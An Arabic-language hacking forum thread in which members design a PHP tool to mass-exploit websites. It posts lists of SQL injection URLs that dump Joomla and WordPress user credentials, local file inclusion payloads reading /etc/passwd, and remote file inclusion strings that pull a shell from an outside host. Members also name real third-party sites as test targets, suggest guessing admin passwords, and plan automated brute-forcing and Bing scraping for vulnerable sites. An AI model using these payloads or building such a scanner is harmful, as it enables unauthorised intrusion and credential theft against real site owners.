No Manual .. with PHP

[b]السلام عليكم …
من فترة في بالي فكرة أضع موضوع في قسم العام
الي عنوا فكرة او بدوا اداة … انا نجرب نبرمجها :stuck_out_tongue:
بس قلت اضعوا هنا في قسم أفضل

الي بدو شيء يتفضل و كل مأفرغ اعملوا
يلا سلام …

[/b]

اهلا نسيمو

بدي أداة أضيف لها مكتبة من الثغرة

ولما احط فيها قائمة الموقع تجرب الثغرات الموجدة في السكربة

زي ماقولنا الاسكربتات المعروفه يآبو نسيم
arabportal
traidnt
4 images
onAcard
بافتكاساتك لو ظبطتلنا ليهم حاجه زي الى عملتها لورد بريس + جوملا … هيبقى تمام التمام

وفي فكره كمان كنت اتكلمت فيها مع انجكتور زمان ممكن تنفعنا ف المنتديات

site.com/vb/
لو عاوزين نخمن
غالبا بيكون باسورد الأدمن أسم الموقع
يعني site
اوقات كتيره بتظبط معايا :smiley:

شوف الى هينفعك والى تقدر تعملو هينفع يازميلي :))

أعطيني مثلا عن ثغرة ؟ sql , lfi , upload …

جميلة جدا الفكرة نسيمو بالتوفيق و الله ايعينك على الأعضاء.

مثل هذا

    public $sql_4 = "/index.php?option=com_books&task=book_details&book_id=-9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users–";
      public $sql_5 = "/index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--";
      public $sql_6 = "/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--";
      public $sql_7 = "/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain";
      public $sql_8 = "/wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*";
      public $sql_9 = "/?page_id=13&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201";
      public $sql_10 = "/wordpress/wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--";
      public $sql_11 = "/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--";
      public $sql_12 = "/index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*";
      public $sql_13 = "/wp-admin/admin.php?page=people&action=printable&event_id=-12+union+select+0,1,2,user_pass+from+wp_users";
      public $lfi_1 = "/jeauto/index.php?option=com_jeauto&view=../../../../../../../../../../../../../../../etc/passwd%00";
      public $lfi_2 = "/index.php?option=com_jeauto&view=../../../../../../../../../../etc/passwd%00";
      public $lfi_3 = "/index.php?option=com_jradio&controller=../../../../../../../../../../etc/passwd%00";
      public $lfi_4 = "/components/com_xgallery/helpers/img.php?file=../../../../../../../../../../etc/passwd%00&Itemid=4";
      public $lfi_5 = "/index.php?option=com_jotloader&section=../../../../../../../../../../etc/passwd%00";
      public $lfi_6 = "/index.php?option=com_picasa2gallery&controller=../../../../../../../../etc/passwd%00";
      public $lfi_7 = "/index.php?option=com_communitypolls&controller=../../../../../..etc/passwd%00";
      public $lfi_8 = "/index.php?option=com_news_portal&controller=../../../../../../../../../../../../etc/passwd%00";
      public $lfi_9 = "/index.php?option=com_ccnewsletter&controller=../../../../../../../etc/passwd%00";
      public $lfi_10 = "/index.php?option=com_jesubmit&view=../../../../../../../../../../etc/passwd%00";

RaYm0n
اها فهمتك … قادر اعملها
بس كل استغلال له علامة خصوصية عندما ينجح … كيف حل ؟
مع lfi مش مشكل نضع علامة من /etc/passwd
مثلا daemon
و مع sqli نقترح
نديرو هكا

http://www.culturalnetwork.asso.dz/evt_fiche.php?evt_id=-2+union+select+1,0x7365633465766572,3,4,5,6,7,8--

مكان العمود المصاب نضع sec4ever نشفر بهكس
هكذا
0x7365633465766572
و عندما يجد كلمة sec4ever كي يكون يجرب في إستغلالت
يعني موقع مصاب
اذا عندك فكرة اخرى اطرحها

راح نبدأ

ايوا هاذي كن نديرها كن ندير رمز # مشفر هههههههه

مثلا أبلود نديرو upload

هذا ريفي

      public $rfi_1 = "/components/com_simpleboard/file_upload.php?sbp=";
      public $rfi_2 = "/index.php?option=com_adsmanager&mosConfig_absolute_path=";
      public $rfi_3 = "/components/com_hashcash/server.php?mosConfig_absolute_path=";
      public $rfi_4 = "/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=";
      public $rfi_5 = "/components/com_performs/performs.php?mosConfig_absolute_path=";
      public $rfi_6 = "/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=";
      public $rfi_7 = "/components/com_smf/smf.php?mosConfig_absolute_path=";

كيما هاك

$sites = trim($sites);
              $bak_1 = self::curl($sites . $this->rfi_1 . $this->shell);
              $bak_2 = self::curl($sites . $this->rfi_2 . $this->shell);
              $bak_3 = self::curl($sites . $this->rfi_3 . $this->shell);

او الشيل

public $shell = "http://xzadx.by.ru/red.txt?";

ههههههههه خلينا نكملوا اولا من بعد ساهل
upload ندير multipart/form-data خطش يجي في فورم تع upload
+
rfi مزال كاينة ؟ :stuck_out_tongue:

وي كاينة غير حنا هملينها ههههههههههه ddd

دا انا طلعة عبيط أوي

إفتكرة الموضوع في القسم العام هههههههههههههههههه

خفة أقول أفكار وتتسرق

مدام فهذا القسم جهز حالك نسيم هههههههههه

تفضل …
عملت لـ sql , rfi , lfi
upload من بعد نشوفو معاها ولا نحطوها في ملف وحدها …
ضع ثغرات في ملف exploits.txt
وضعت زوج …
جرب على هذوا موقع و ردلي

http://www.villeblevin.fr/
http://apexsuspension.com/gb/
http://www.slickbar.co.id/
http://www.google.dz/
http://www.culturalnetwork.asso.dz/

هههههه وكان وضعت موضوع في قسم عام تشوف ردود وصلت لـ رد 2000 ddd
شيكو طلبك في طريق …

raym0n.rar (1.01 KB)

ههههههههههه

طيارة خويا ههههههههه

انا نروح نرقد راني دايخ

بنهار نجي نجرب هاد لعجب

ستناني ddd

راه نجيب كاميون نتع الأفكار هههههههه ddd

هلا والله نسيمو …
ممم شو رايك لو تعمل سكربت فيه كل اداوتك للتخمين على التالي :
ترايدنت + في بي + جوملا + عرب بورتال + وورد برس + سي بنل … هلا هذا السكربت يكون بيدور على المواقع في السيرفر لوحده ويطلعهم ويخمن عليهم + يلاقي يوزرات السي بنل ويخمن عليهم برضو لوحدو … + السكربت فيه دوال تجيب اسماء السكربتات اللي مركبه على السيرفر …
يعني ببساطه هذا السكربت اذا قدرت تعمله بتكون انهيت شغله الاستهداف كلها يعني الواحد بيشغله وبيروح بس يرجع بيكون لقي كل الباسات عندو :slight_smile:

بالتوفيق يا ابو النسم ههه … وال 4 نقاط للمسابقه عدلناها مبارح :slight_smile:

علاء سبقنى فى الفكرة
هههههههههه
السكربت تبعك بتاع جوملا وورد بريس
اذا ضفت ليه شوية سكربتات كمان
يبقى جبت من الاخر يا نسيم
+
سكربت يفحص صفحات السيرفر عن طريق bing
يبحث عن فورمات الابلود ويحط المواقع تبعها فى تكست
دنت هتتنفخ بس اصبر
هههههههه

اوكيه ان شاء لله اعمل كل ده و اي شيء اعملوا انزلوا هنا

الان في بالي سكريبت جمع يوزرات
3 طرق
تخمين , wordpress و bing
راح أبدا و حين … كل دول وجدين تقريبا ازبطوا و انزلوا

تمام يا برنس بانتظارك ان شاء الله :slight_smile:

نسيم انا هنا ليس للطلب و لكن لأقدم المساعدة :slight_smile:
و بما انو نسيم الآن همو الوحيد الدارسة

ممكن نكملو الرحلة اللتي بدأها :slight_smile:

كرهت حتى لنفسي وليت نعجز نخدم حاجات … بصح مدامك هنا خلينا نكملوا

زوج دوال العمل معاهم بنسبة كبيرة

source تخدم بيها باش تجيب سورس و post
bing تعمل مع source و تجيب بيها مواقع من bing :))

<?

    function bing($what,$mode=false){ 
    for($i = 1; $i <= 2000; $i += 10){ 
    $source = source("http://www.bing.com/search?q=".str_replace(" ","+",$what)."&first=$i"); 
    preg_match_all('#<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>#siU', $source, $links); 
    foreach($links[1] as $link) $allLinks[] = ($mode) ? "http://".parse_url($link, PHP_URL_HOST)."/":$link; 
    if(!preg_match("/first=".($i)."/",$source)) break; } 
    return array_unique($allLinks); 
    } 
 

    function source($url,$post=false,$flw=0){ 
    $curl=curl_init(); 
    (preg_match("/https/",$url)) ? curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false):""; 
    curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); 
    curl_setopt($curl,CURLOPT_URL,$url); 
    curl_setopt($curl,CURLOPT_HEADER, 1); 
    curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 DzCURL =)'); 
    curl_setopt($curl,CURLOPT_FOLLOWLOCATION,$flw); 
    //curl_setopt($curl,CURLOPT_TIMEOUT,10); 
    if($post){ 
    curl_setopt($curl,CURLOPT_POST,1); 
    curl_setopt($curl,CURLOPT_POSTFIELDS,$post); 
    } 
    $source=curl_exec($curl); 
    curl_close($curl); 
    return $source; 
    }
?>

لله يعاونك القط